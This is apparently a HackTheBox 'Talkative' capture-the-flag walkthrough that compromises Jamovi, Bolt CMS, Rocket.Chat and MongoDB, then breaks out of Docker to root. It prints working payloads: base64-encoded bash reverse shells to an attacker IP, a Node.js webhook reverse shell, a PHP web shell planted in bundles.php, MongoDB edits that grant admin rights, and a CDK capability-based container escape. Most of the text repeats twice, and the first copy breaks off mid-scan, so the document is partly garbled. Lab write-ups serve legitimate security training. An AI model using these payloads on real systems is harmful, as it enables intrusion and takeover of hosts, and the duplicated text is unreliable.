# HackTheBox - Talkative
## NMAP
```bash
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52
3000/tcp open ppp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| X-XSS-Protection: 1
| X-Instance-ID: i3D7nWb4BARMskXKt
| Content-Type: text/html; charset=utf-8
| Vary: Accept-Encoding
| Date: Sat, 09 Apr 2022 19:09:17 GMT
| Connection: close
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Visiting port 80 will redirect us to `talkative.htb` so let's add this to `/etc/hosts` file
Scolling below we do see some names which can be helpful for us later
Going at the bottom we have 2 links about the products which will be launched soon
The first one "TALK-A-STATS" is about a `JAMOVI` spreadsheet software running on port 8080
And the other "TALKFORBIZ" is `rocket chat` running on port 3000
I tried fuzzing for files using `dirsearch` but it was awfully slow
Checking what wappalyzer showed us about what backend or technologies the website is using
It's using bolt cms, we can access the login page by visting `/bolt`, I found this end point by lookup at bolt's documentation
https://docs.boltcms.io/5.0/manual/login
Right now we don't have any credentials so let's just move on
## PORT 3000 (rocket chat)
I tried creating an account on rocket chat
It then prompted error about invalid domain
So let's just used `talkative.htb` as domain name
This allowed us to register an account but we don't see anything there apart from `General` channel in which there's only admin
So I decided to run the exploit for password reset on admin account
https://www.exploit-db.com/exploits/50108
But it didn't seem that it was working as it was just printing the alphabets
## PORT 8080 (jamovi)
Checking for exploits related jamovi there's one related to XSS that can be escalted to rce
https://sploitus.com/exploit?id=F45F77BE-1B49-5574-A908-64EF4C774BD7&utm_source=rss&utm_medium=rss
The description of exploit says
```
Jamovi is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.
```
So the column name is vulnerable to XSS, let's test this if it works here
Now when we refresh the page it's going to execute the alert command
But this was only XSS and we can't escalate this further to get rce in this scenario
If we see the options we have on javormi there's `Rj` editor, so we can try to execute commands using the R language
So lookup the documentation for R langague we can execute system commands like this
https://rdrr.io/r/base/system.html
```bash
system("bash -c 'id'", intern = TRUE)
```
We get the output of the `id` command as a root user but we are not actually the root user on the target machine, if we check the `hostname` this will return as a random value which indicates that we are inside a docker container
To get a reverse shel I used bash reverse encoded in base64
```bash
system("bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ni8yMjIyIDA+JjEK | base64 -d |bash'",intern = TRUE)
```
After getting a shell we can stabilize it so we can get the functionality of using arrow keys and tab auto complete
In root's folder we can see a `omv` file named `bolt-administration`
Now the issue here was there was no netcat,net-tools,curl or wget that I could transfere this omv file on to my machine neither there was any tool to unzip the omv file so I base64 encoded the contents of the file
Copied it on my host machine's terminal and saved it then piped it to base64 decode and got the file
Reading the `xdata.json` we can see usernames and passwords for bolt
I tried the credentials for `janit` , it failed
Tried `sual`'s credentials which gave an error on authenticating
Same with `matt`, so I decided to test `admin` as the username with the passwords and `jeO09ufhWD
We can also see the bolt version which is `Bolt v 5.1.3`
Having access to admin dashboard we can an option to upload files but problem is that it has a whitelist that is allowing specfic file extensions
Visting `All Configuration Files` from `Configuration` we'll see a file named `bundles.php`
Adding a php command in that file will lead too execute that on a 404 request
I tried getting the reverse shell the same way as I did with javormi container but the connection kept closing
```bash
system("bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ni8yMjIyIDA+JjEK | base64 -d |bash'")
```
Instead I just copied php bash a web interactive shell in bundles.php
https://github.com/Arrexel/phpbash/blob/master/phpbash.php
So looks like we are in another container and this would be for bolt cms, we can get a reverse shell from here
The reason I used `rlwrap` before `nc` is because there's no python or python3 on container which would allow us to stabilize the shell to get autocomplete and naviagting around bash history so rlwrap kinda gives us that functionaility
On the conatiner we can also see that there's `curl` so we can download `nmap` and run a scan to see if there are any other containers in the network
But I wasn't able to run the nmap on the container as it first checked if service scripts were in the path and if not it would revert to `/etc/services` which wasn't on the container as well
I thought of using ssh on the target machine (talkative.htb) as the docker gateways is the host machine but it was giving an error because we didn't have a tty shell
This can be resolved by using `script` to spawn bash shell
And with the password `jeO09ufhWD
We can try to get a stabilize shell by first getting a reverse shell and stabilizing it with python3
After I transferred `pspy` to monitor the background processes running
`update_mongo.py` seemed interesting but we didn't had permissions to read it so checking to see if there's any local port listening
This gave us a lot of open ports but out all of open ports, port 3000 seemes interesting as this is what we encountered earlier and it semes that it's hosted from this machine
Checking the apache config files to see where rocket chat's directory is
It didn't showed us the path but we know that `admin@talkative.htb` is a valid username on that site, running `arp -a` will reveal how many containers the host is using
Using the static binary of nmap we transferred
Googling this port tells that this is for `mongodb` and rocket chat uses mongdb for it's backend
So we need to do port forwarding for `27017` that is open on `172.17.0.2` conatiner and we can do that by using `chisel`
https://github.com/jpillora/chisel/releases/tag/v1.7.7
Transferring this binary on the target machine
After transferring on the target machine we'll use chisel as a server on port 9000 using reverse proxy for port forwarding and on the target machine we'll use chisel client to conenct to port 9000 from our local machine and forwarding port 27017 from the container 172.17.0.2
This article does a great job in explaning this process
https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683
To interact with mongodb we need to use `mongosh`, it isn't installed by default so downloading mongo db and it's dependencies
https://www.dailytask.co/task/install-mongo-shell-in-ubuntu-ahmed-zidan
Using this command we'll be able to connect to mongodb
```bash
mongosh "mongodb://localhost:27017"
```
Getting connected to mongo backend we can run commands to enumerate databases, I wasn't familar with using mongosh so this article helped me in enumerating the databaes and tables
https://dzone.com/articles/mongodb-commands-cheat-sheet-for-beginners
We can see the size of `meteor` is around 5 MB so it must be having some data, switching to meteor database with `use meteor`
Listing the values in `users` with `db.user.find()`
At first I tried changing the password to `12345` and converting into bcrypt hash and then updating the admin user's password
https://docs.rocket.chat/guides/administration/misc.-admin-guides/restoring-an-admin
```bash
db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$ZcP2SxsOH811cJjuxgvk.udV8pkPx7Hw6G9GqKr08S3ZcYFnNRz7C" } } } })
```
But this wasn't working as when I visited the rocket chat site it was still giving an error on login so instead I created a user and gave him the admin role
```bash
db.users.update({username: "arz"}, { $push: { roles: "admin"}})
```
The reason why I port forwarded 3000 is because it wasn't repsonding normally with
`talkative.htb:3000` so I port forwarded like I did for mongodb
We can get remote execution by using node js and calling a bash reverse shell, there's a blog explaining abusing intergration to get remote code execution
https://blog.sonarsource.com/nosql-injections-in-rocket-chat
Access the administration panel and visit Integrations and then select `Incoming WebHook`
```bash
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.73/6666 0>&1'");
```
After saving changes, you'll get a url for webhook
Visit this link and you'll get a shell
After getting a shell we are again inside a container, there wasn't anything interesting on this container , so I decide to check what capabilites we have on this docker instance
So no `capsh` binary but there's another way to view capabilites by reading `/proc/self/status` and using capsh from our local machine
https://blog.nody.cc/posts/container-breakouts-part2/
Copying the value `CapBnd` which is `00000000a80425fd`
Here we can see a capability `cap_dac_read_search` which allows us to read the files from the host machine
https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
There was an exploit written in c language which was linked in the article, I downloaded the source code and compiled on my local machine
http://stealth.openwall.net/xSports/shocker.c
Since there was no wget or curl through which we can download binary , I used the `cat` to download the binary from our machine by hosting it through `nc`
```bash
cat < /dev/tcp/10.10.14.139/1111 > test
```
```bash
nc -lnvp 1111 < test
```
But this exploit failed to ran, so went on searching other exploits and found a github repo for `cdk`
https://github.com/cdk-team/CDK
Downloaded the binary on my local machine and transferred it the same way
Tried running this binary to read `/etc/hosts` from the host machine but still it failed
Nex tried this command
```bash
./cdk run cap-dac-read-search /etc/hosts /
```
This worked as it was able to chdir to host root `/` as spawning bash, to get a shell on the host machine as root user we can put our public key in `/root/.ssh/authorized_keys`
Going back to the host machine as saul user and downloading the ssh private key
## References
- https://www.exploit-db.com/exploits/50108
- https://github.com/theart42/cves/blob/master/CVE-2021-28079/CVE-2021-28079.md
- https://sploitus.com/exploit?id=F45F77BE-1B49-5574-A908-64EF4C774BD7&utm_source=rss&utm_medium=rss
- https://rdrr.io/r/base/system.html
- https://docs.boltcms.io/5.0/manual/login
- https://github.com/Arrexel/phpbash/blob/master/phpbash.php
- https://github.com/jpillora/chisel/releases/tag/v1.7.7
- https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683
- https://dzone.com/articles/mongodb-commands-cheat-sheet-for-beginners
- https://stackoverflow.com/questions/24985684/mongodb-show-all-contents-from-all-collections
- https://docs.rocket.chat/guides/administration/misc.-admin-guides/restoring-an-admin
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
- https://blog.nody.cc/posts/container-breakouts-part2/
- https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
- http://stealth.openwall.net/xSports/shocker.c
- https://github.com/cdk-team/CDK
Scolling below we do see some names which can be helpful for us later
Going at the bottom we have 2 links about the products which will be launched soon
The first one "TALK-A-STATS" is about a `JAMOVI` spreadsheet software running on port 8080
And the other "TALKFORBIZ" is `rocket chat` running on port 3000
I tried fuzzing for files using `dirsearch` but it was awfully slow
Checking what wappalyzer showed us about what backend or technologies the website is using
It's using bolt cms, we can access the login page by visting `/bolt`, I found this end point by lookup at bolt's documentation
https://docs.boltcms.io/5.0/manual/login
Right now we don't have any credentials so let's just move on
## PORT 3000 (rocket chat)
I tried creating an account on rocket chat
It then prompted error about invalid domain
So let's just used `talkative.htb` as domain name
This allowed us to register an account but we don't see anything there apart from `General` channel in which there's only admin
So I decided to run the exploit for password reset on admin account
https://www.exploit-db.com/exploits/50108
But it didn't seem that it was working as it was just printing the alphabets
## PORT 8080 (jamovi)
Checking for exploits related jamovi there's one related to XSS that can be escalted to rce
https://sploitus.com/exploit?id=F45F77BE-1B49-5574-A908-64EF4C774BD7&utm_source=rss&utm_medium=rss
The description of exploit says
```
Jamovi is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.
```
So the column name is vulnerable to XSS, let's test this if it works here
Now when we refresh the page it's going to execute the alert command
But this was only XSS and we can't escalate this further to get rce in this scenario
If we see the options we have on javormi there's `Rj` editor, so we can try to execute commands using the R language
So lookup the documentation for R langague we can execute system commands like this
https://rdrr.io/r/base/system.html
```bash
system("bash -c 'id'", intern = TRUE)
```
We get the output of the `id` command as a root user but we are not actually the root user on the target machine, if we check the `hostname` this will return as a random value which indicates that we are inside a docker container
To get a reverse shel I used bash reverse encoded in base64
```bash
system("bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ni8yMjIyIDA+JjEK | base64 -d |bash'",intern = TRUE)
```
After getting a shell we can stabilize it so we can get the functionality of using arrow keys and tab auto complete
In root's folder we can see a `omv` file named `bolt-administration`
Now the issue here was there was no netcat,net-tools,curl or wget that I could transfere this omv file on to my machine neither there was any tool to unzip the omv file so I base64 encoded the contents of the file
Copied it on my host machine's terminal and saved it then piped it to base64 decode and got the file
Reading the `xdata.json` we can see usernames and passwords for bolt
I tried the credentials for `janit` , it failed
Tried `sual`'s credentials which gave an error on authenticating
Same with `matt`, so I decided to test `admin` as the username with the passwords and `jeO09ufhWD
Having access to admin dashboard we can an option to upload files but problem is that it has a whitelist that is allowing specfic file extensions
Visting `All Configuration Files` from `Configuration` we'll see a file named `bundles.php`
Adding a php command in that file will lead too execute that on a 404 request
I tried getting the reverse shell the same way as I did with javormi container but the connection kept closing
```bash
system("bash -c 'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40Ni8yMjIyIDA+JjEK | base64 -d |bash'")
```
Instead I just copied php bash a web interactive shell in bundles.php
https://github.com/Arrexel/phpbash/blob/master/phpbash.php
So looks like we are in another container and this would be for bolt cms, we can get a reverse shell from here
The reason I used `rlwrap` before `nc` is because there's no python or python3 on container which would allow us to stabilize the shell to get autocomplete and naviagting around bash history so rlwrap kinda gives us that functionaility
On the conatiner we can also see that there's `curl` so we can download `nmap` and run a scan to see if there are any other containers in the network
But I wasn't able to run the nmap on the container as it first checked if service scripts were in the path and if not it would revert to `/etc/services` which wasn't on the container as well
I thought of using ssh on the target machine (talkative.htb) as the docker gateways is the host machine but it was giving an error because we didn't have a tty shell
This can be resolved by using `script` to spawn bash shell
And with the password `jeO09ufhWD
After I transferred `pspy` to monitor the background processes running
`update_mongo.py` seemed interesting but we didn't had permissions to read it so checking to see if there's any local port listening
This gave us a lot of open ports but out all of open ports, port 3000 seemes interesting as this is what we encountered earlier and it semes that it's hosted from this machine
Checking the apache config files to see where rocket chat's directory is
It didn't showed us the path but we know that `admin@talkative.htb` is a valid username on that site, running `arp -a` will reveal how many containers the host is using
Using the static binary of nmap we transferred
Googling this port tells that this is for `mongodb` and rocket chat uses mongdb for it's backend
So we need to do port forwarding for `27017` that is open on `172.17.0.2` conatiner and we can do that by using `chisel`
https://github.com/jpillora/chisel/releases/tag/v1.7.7
Transferring this binary on the target machine
After transferring on the target machine we'll use chisel as a server on port 9000 using reverse proxy for port forwarding and on the target machine we'll use chisel client to conenct to port 9000 from our local machine and forwarding port 27017 from the container 172.17.0.2
This article does a great job in explaning this process
https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683
To interact with mongodb we need to use `mongosh`, it isn't installed by default so downloading mongo db and it's dependencies
https://www.dailytask.co/task/install-mongo-shell-in-ubuntu-ahmed-zidan
Using this command we'll be able to connect to mongodb
```bash
mongosh "mongodb://localhost:27017"
```
Getting connected to mongo backend we can run commands to enumerate databases, I wasn't familar with using mongosh so this article helped me in enumerating the databaes and tables
https://dzone.com/articles/mongodb-commands-cheat-sheet-for-beginners
We can see the size of `meteor` is around 5 MB so it must be having some data, switching to meteor database with `use meteor`
Listing the values in `users` with `db.user.find()`
At first I tried changing the password to `12345` and converting into bcrypt hash and then updating the admin user's password
https://docs.rocket.chat/guides/administration/misc.-admin-guides/restoring-an-admin
```bash
db.getCollection('users').update({username:"admin"}, { $set: {"services" : { "password" : {"bcrypt" : "$2a$10$ZcP2SxsOH811cJjuxgvk.udV8pkPx7Hw6G9GqKr08S3ZcYFnNRz7C" } } } })
```
But this wasn't working as when I visited the rocket chat site it was still giving an error on login so instead I created a user and gave him the admin role
```bash
db.users.update({username: "arz"}, { $push: { roles: "admin"}})
```
The reason why I port forwarded 3000 is because it wasn't repsonding normally with
`talkative.htb:3000` so I port forwarded like I did for mongodb
We can get remote execution by using node js and calling a bash reverse shell, there's a blog explaining abusing intergration to get remote code execution
https://blog.sonarsource.com/nosql-injections-in-rocket-chat
Access the administration panel and visit Integrations and then select `Incoming WebHook`
```bash
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.73/6666 0>&1'");
```
After saving changes, you'll get a url for webhook
Visit this link and you'll get a shell
After getting a shell we are again inside a container, there wasn't anything interesting on this container , so I decide to check what capabilites we have on this docker instance
So no `capsh` binary but there's another way to view capabilites by reading `/proc/self/status` and using capsh from our local machine
https://blog.nody.cc/posts/container-breakouts-part2/
Copying the value `CapBnd` which is `00000000a80425fd`
Here we can see a capability `cap_dac_read_search` which allows us to read the files from the host machine
https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
There was an exploit written in c language which was linked in the article, I downloaded the source code and compiled on my local machine
http://stealth.openwall.net/xSports/shocker.c
Since there was no wget or curl through which we can download binary , I used the `cat` to download the binary from our machine by hosting it through `nc`
```bash
cat < /dev/tcp/10.10.14.139/1111 > test
```
```bash
nc -lnvp 1111 < test
```
But this exploit failed to ran, so went on searching other exploits and found a github repo for `cdk`
https://github.com/cdk-team/CDK
Downloaded the binary on my local machine and transferred it the same way
Tried running this binary to read `/etc/hosts` from the host machine but still it failed
Nex tried this command
```bash
./cdk run cap-dac-read-search /etc/hosts /
```
This worked as it was able to chdir to host root `/` as spawning bash, to get a shell on the host machine as root user we can put our public key in `/root/.ssh/authorized_keys`
Going back to the host machine as saul user and downloading the ssh private key
## References
- https://www.exploit-db.com/exploits/50108
- https://github.com/theart42/cves/blob/master/CVE-2021-28079/CVE-2021-28079.md
- https://sploitus.com/exploit?id=F45F77BE-1B49-5574-A908-64EF4C774BD7&utm_source=rss&utm_medium=rss
- https://rdrr.io/r/base/system.html
- https://docs.boltcms.io/5.0/manual/login
- https://github.com/Arrexel/phpbash/blob/master/phpbash.php
- https://github.com/jpillora/chisel/releases/tag/v1.7.7
- https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683
- https://dzone.com/articles/mongodb-commands-cheat-sheet-for-beginners
- https://stackoverflow.com/questions/24985684/mongodb-show-all-contents-from-all-collections
- https://docs.rocket.chat/guides/administration/misc.-admin-guides/restoring-an-admin
- https://blog.sonarsource.com/nosql-injections-in-rocket-chat
- https://blog.nody.cc/posts/container-breakouts-part2/
- https://medium.com/@fun_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3
- http://stealth.openwall.net/xSports/shocker.c
- https://github.com/cdk-team/CDK